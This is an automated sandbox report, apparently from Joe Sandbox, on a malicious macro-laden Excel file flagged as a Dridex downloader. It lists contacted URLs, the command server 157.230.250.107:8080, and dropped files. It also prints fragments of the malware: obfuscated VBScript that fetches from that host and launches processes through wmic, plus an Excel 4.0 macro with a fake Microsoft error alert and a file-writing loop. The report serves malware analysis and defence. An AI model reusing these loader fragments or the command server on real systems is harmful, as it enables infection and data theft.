                                                                                                                          https://outlook.office.com$EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		low
                                                                                                                          https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://clients.config.office.net/user/v1.0/android/policies0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drfalse
                                                                                                                              		high
                                                                                                                              https://graph.windows.net/https://graph.windows.netEXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://login.windows.net/common/oauth2/authorizeREXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeSEXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://management.azure.comfREXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oauEXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://157.230.250.107:8080/mfkrmotherfuckerumshta.exe, 00000006.00000003.699233022.000001BF49909000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.958349675.000001BF49909000.00000004.00000020.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown

                                                                                                                                        Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        157.230.250.107
                                                                                                                                        		unknownUnited States
                                                                                                                                        		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                        Analysis ID:532307
                                                                                                                                        Start date:02.12.2021
                                                                                                                                        Start time:00:36:40
                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 6m 33s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:full
                                                                                                                                        Sample file name:3762.xlsm
                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                        Run name:Potential for more IOCs and behavior
                                                                                                                                        Number of analysed new started processes analysed:18
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • HDC enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal88.troj.expl.evad.winXLSM@5/8@0/1
                                                                                                                                        EGA Information:Failed
                                                                                                                                        HDC Information:Failed
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                        • Number of executed functions: 0
                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Adjust boot time
                                                                                                                                        • Enable AMSI
                                                                                                                                        • Found application associated with file extension: .xlsm
                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                        • Attach to Office via COM
                                                                                                                                        • Scroll down
                                                                                                                                        • Close Viewer
                                                                                                                                        Warnings:
                                                                                                                                        Show All
                                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.8.25, 52.109.76.34, 52.109.8.22
                                                                                                                                        • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532307/sample/3762.xlsm

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        TimeTypeDescription
                                                                                                                                        00:37:50API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                        00:37:51API Interceptor2x Sleep call for process: mshta.exe modified

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        157.230.250.10756449657.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        3762.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        55339.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        55339.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        44307.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        44307.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        88985.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        88985.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
                                                                                                                                        845725272.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e

                                                                                                                                        Domains

                                                                                                                                        No context

                                                                                                                                        ASN

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        DIGITALOCEAN-ASNUS56449657.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        3762.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        55339.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        08676789691.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        55339.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        SecuriteInfo.com.Heur.17052.xlsGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        SecuriteInfo.com.Heur.8342.xlsGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        57949616735.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        44307.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        44307.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        77859564213.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        1762311.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        88985.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        88985.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107
                                                                                                                                        845725272.xlsmGet hashmaliciousBrowse
                                                                                                                                        • 157.230.250.107

                                                                                                                                        JA3 Fingerprints

                                                                                                                                        No context

                                                                                                                                        Dropped Files

                                                                                                                                        No context

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\ProgramData\LZbir.rtf
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5008
                                                                                                                                        Entropy (8bit):5.1286340002331405
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:5VtuOHyGMyE9owU6lurfkIHyF97GX37U1UXFDyO7MxToIHmHv/d2/aWsBIsZVC8S:5zuoJMyE9o1qurfkeyF97U37UaVDylxJ
                                                                                                                                        MD5:7B05719F5586ECD91FFE8D5AB82C3EF3
                                                                                                                                        SHA1:B734F1CCE1B8AC5E0E136088209D553BA7B85BAD
                                                                                                                                        SHA-256:350098494D3DD56B2FCC8F2AA06F14DD88844610DA2B4CA17D020631B56B188A
                                                                                                                                        SHA-512:8A5C3E955ADE0347CFED6D65EB6A53BAABCE755A71EE6F120C8A1F510F443B86DACE23CE965EF564F1E7C6836311984E259FC838424DA78DDB39DA47625C4D20
                                                                                                                                        Malicious:true
                                                                                                                                        Yara Hits:
                                                                                                                                        • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\LZbir.rtf, Author: Joe Security
                                                                                                                                        Reputation:low
                                                                                                                                        Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >....Function TWeqrrfkdtsDX()..Set uTVReIEktw = CreateObject("MS" & "" & "XM" & "L2." & "" & "Ser" & "ve" & "rXM" & "LHT" & Chr(84) & "P.6" & "" & ".0")..uTVReIEktw.Open "" & "" & "" & "" & Chr(71) & "ET", "ht" & Chr(116) & "p:/" & "/15" & Chr(55) & Chr(46) & "23" & "0." & "" & Chr(50) & "50" & ".10" & "" & "7:8" & "08" & "0/" & "mfk" & "rm" & "oth" & "er" & Chr(102) & Chr(117) & "ck" & Chr(101) & "" & "ru" & "6y8" & "2sa" & "ssw" & Chr(104) & Chr(111) & Chr(114) & "eh" & Chr(102) & Chr(57) & Chr(101), False ..uTVReIEktw.SetRequestHeader "User-Agent","booby"..uTVReIEktw.Send..End Function....Function rQqwyQNnBmtu()..oisEjOOYCYq = "wm" & "ic " & Chr(112) & Chr(114) & "oce" & "ss" & Chr(32) & "ca" & Chr(108) & Chr(108) & Chr(32) & "cre" & "ate"
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\0E1DCC09-05B4-4691-AA45-316DEEA02104
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):140163
                                                                                                                                        Entropy (8bit):5.358164476886779
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:YcQIfgxrBdA3gBwtnQ9DQW+zCb4Ff7nXbovidXiE6LWmE9:EuQ9DQW+zJXfH
                                                                                                                                        MD5:0DF56D2B9C0E2E3FA24BDA3CEDFBC290
                                                                                                                                        SHA1:45902210DC5E159891FF9AA6E4405208A8642BBE
                                                                                                                                        SHA-256:F540781B63928E5EFB90DADF7C6C3C2CD73C6C626371511AE9AE870B711FBB18
                                                                                                                                        SHA-512:3249B182E5D534715837FCD793BD38B74D490846B73A8D9E1452EC647F22C043FF70F6953AABA0A9C55AFD1DF787BFD5B7DE3F8EA648B4993728A46E9CFAAEA3
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-01T23:37:41">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D0FA441F.png
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:PNG image data, 960 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):95290
                                                                                                                                        Entropy (8bit):7.964656092224063
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:Z1M1Jci8gZKV4LZqcJ9D/ufmtLPLVNJoCH0/UN8EDmPmPH9999999GAdqT99999b:Z1M16TguaNTLGmtLfJ3hN8DqH999999q
                                                                                                                                        MD5:D3C811B819094DAD38EAECB1DFFC8E50
                                                                                                                                        SHA1:712F71711F017D47A447BF96C6D35686AB0C64FC
                                                                                                                                        SHA-256:CF5F75B2DEBB0A1D6BA1C0131DAD4FA7BC6E117CB525D853F5697EC0830615C0
                                                                                                                                        SHA-512:D181328D708F185A3AB810687D0034A56D5C5EF85D990623032FF3259A7B40BB448F5B1E17C9AE57300F6222B829FF0F685463DC889AC48F25F7B629916DE29B
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview: .PNG........IHDR.............9].{....IDATx..w.%u}...L?..}....]`.I..f....cLl..h..Q.c.%?%F...A,.t.EAQz.e;...M.|~.|f.,".K.<}\...93s..;.y...PJ)....`0.....`x.c=.;`0.....`0....S......`0.....`x^`...`0.....`0.....l0.....`0.....F......`0.....y......`0.....`x^`...`0.....`0.....l0.....`xJQJ..z.w.`0<.q...0.....`0<.(..b...O..`0...S.6.....`0LA..GDj!...6.7o...7......`..`0...C)N.].......$I..)%Y..eY.l..H).uH)I.\_....>...p.'.q.F.r..W......c0..O...m0...b..D..'W.Q..,X....!..JJ.e..B.R),K..~..B.{.Rf.@..u....X...+...QJ!.`..|.........3..u..|..L...,........<_....;...<.F..R.Q...S.k.}4...'.......,F...S.5.z......E../f..U.|..k._..2.....]........Y)..D...6......q.....<..k....E....o..z.....F.....?...G...^......~................. .{.G.y$.s.....h4.B.~.z....c...:.,.8.....s.=...? MS.?..r;....d1..`0.....o".X.....:P..%..........>..8..E...0...+t;]....,^.i/<.Q.^....S_x..../......W..{..5.6>.9/y.....)%...2.lZ..g.....0......l._..v3..~,.jm.k....h].Z.....~..3{.lz..+W.....s..._..W.
                                                                                                                                        C:\Users\user\Desktop\3762.xlsm (copy)
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):133539
                                                                                                                                        Entropy (8bit):7.95007185084026
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:q4UoWgUd1zXGa1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanOO:9dWbXGB+kLGmxfJ3hNci3OO
                                                                                                                                        MD5:F2270F8ED4274A51C71FC0A49BE010D8
                                                                                                                                        SHA1:A15331EC780E53A78C8039BB1CFFB50F958ABD3B
                                                                                                                                        SHA-256:43FF20C31D08D394931C02293A6957F3DFCCDD957490FD67D0F66BB12B4FF868
                                                                                                                                        SHA-512:B74D5145241792F0E4A7849731F948D51B389CFDFAE636B782E9B0DCCC4665AF36651F6D7529744CFB1884B7751496529A46756C85EA9C2F62FE370C1A7B1EC2
                                                                                                                                        Malicious:true
                                                                                                                                        Reputation:low
                                                                                                                                        Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                        C:\Users\user\Desktop\9BB50000
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):133539
                                                                                                                                        Entropy (8bit):7.95007185084026
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:q4UoWgUd1zXGa1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanOO:9dWbXGB+kLGmxfJ3hNci3OO
                                                                                                                                        MD5:F2270F8ED4274A51C71FC0A49BE010D8
                                                                                                                                        SHA1:A15331EC780E53A78C8039BB1CFFB50F958ABD3B
                                                                                                                                        SHA-256:43FF20C31D08D394931C02293A6957F3DFCCDD957490FD67D0F66BB12B4FF868
                                                                                                                                        SHA-512:B74D5145241792F0E4A7849731F948D51B389CFDFAE636B782E9B0DCCC4665AF36651F6D7529744CFB1884B7751496529A46756C85EA9C2F62FE370C1A7B1EC2
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:low
                                                                                                                                        Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                        C:\Users\user\Desktop\9BB50000:Zone.Identifier
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):26
                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                        Malicious:false
                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                        C:\Users\user\Desktop\~$3762.xlsm
                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):165
                                                                                                                                        Entropy (8bit):1.6081032063576088
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                        MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                        SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                        SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                        SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                        \Device\ConDrv
                                                                                                                                        Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):160
                                                                                                                                        Entropy (8bit):5.095703110114614
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnW73vlJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egWjdeAc
                                                                                                                                        MD5:588A50231429063AC56F32F11D942EE0
                                                                                                                                        SHA1:DFDEC9A10F982C1FB105B26DFC8EF3A17A08A870
                                                                                                                                        SHA-256:1AA492A7DCF837201E82783B1A2084D8D1B1CC22C5DD7AF947BADA9C2E0C0356
                                                                                                                                        SHA-512:7405DFEB080C91A8925F5F9DEB3A3EA808DA35ADA249901E7D032849A9CEF497395C555AD766D546F69473BE8BC0115086F371233978FD53E44F3CF991A97352
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5348;...ReturnValue = 0;..};....

                                                                                                                                        Static File Info

                                                                                                                                        General

                                                                                                                                        File type:Microsoft Excel 2007+
                                                                                                                                        Entropy (8bit):7.941974625529544
                                                                                                                                        TrID:
                                                                                                                                        • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                        • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                        • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                        File name:3762.xlsm
                                                                                                                                        File size:134949
                                                                                                                                        MD5:db35212aa7fbb90f60c862a82fc4f34c
                                                                                                                                        SHA1:9167a3c7816d6cba5335c74da2fc2c786b9c131e
                                                                                                                                        SHA256:dd589bbbfcec22650ed4aeb33606b6d9ee4b2afdce6cb2e22435f34348714f81
                                                                                                                                        SHA512:1e507da789e0cd52ee1ccbe2cdf0f8bdf14e9fe312d4f4960176f4d0a85c567ad7c0ee30bd3c3a9aff50412e3a99d2d51b9fb8b77ae6ab24bfc4c75861c55e01
                                                                                                                                        SSDEEP:3072:dqj78YUCg1M16TguaNTLGmtLfJ3hN8DqH9999999HqT99999999WnsAGanOpKdR/:dq3vt+kLGmxfJ3hNci3Owdh
                                                                                                                                        File Content Preview:PK..........!.8v..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                        File Icon

                                                                                                                                        Icon Hash:74ecd0e2f696908c

                                                                                                                                        Static OLE Info

                                                                                                                                        General

                                                                                                                                        Document Type:OpenXML
                                                                                                                                        Number of OLE Files:1

                                                                                                                                        OLE File "3762.xlsm"

                                                                                                                                        Indicators

                                                                                                                                        Has Summary Info:
                                                                                                                                        Application Name:
                                                                                                                                        Encrypted Document:
                                                                                                                                        Contains Word Document Stream:
                                                                                                                                        Contains Workbook/Book Stream:
                                                                                                                                        Contains PowerPoint Document Stream:
                                                                                                                                        Contains Visio Document Stream:
                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                        Flash Objects Count:
                                                                                                                                        Contains VBA Macros:

                                                                                                                                        Macro 4.0 Code

                                                                                                                                        1,21,=N80+U51
2,21,=A71-E93
5,21,=C77+L95
7,21,=K49+B61
8,21,=I30*Z11
11,21,=ALERT("" & CHAR(69) & "rror! Sendi" & CHAR(110) & "g r" & CHAR(101) & "port to Mic" & CHAR(114) & "osoft" & CHAR(46) & CHAR(46) & CHAR(46))
12,21,=C63-D96
17,21,=A3*C24
19,21,=B10-L90
21,21,=FOPEN(CHAR(67) & ":\ProgramData\LZb" & CHAR(105) & CHAR(114) & ".rt" & CHAR(102), 3)
24,21,=Z2-U69
25,21,=E80*Q29
26,21,=B68*J14
27,21,=M35-L97
30,21,=D89+E9
32,21,=FOR.CELL("fxrlv",Sheet1!BF164:BM789, TRUE)
33,21,=M57+O75
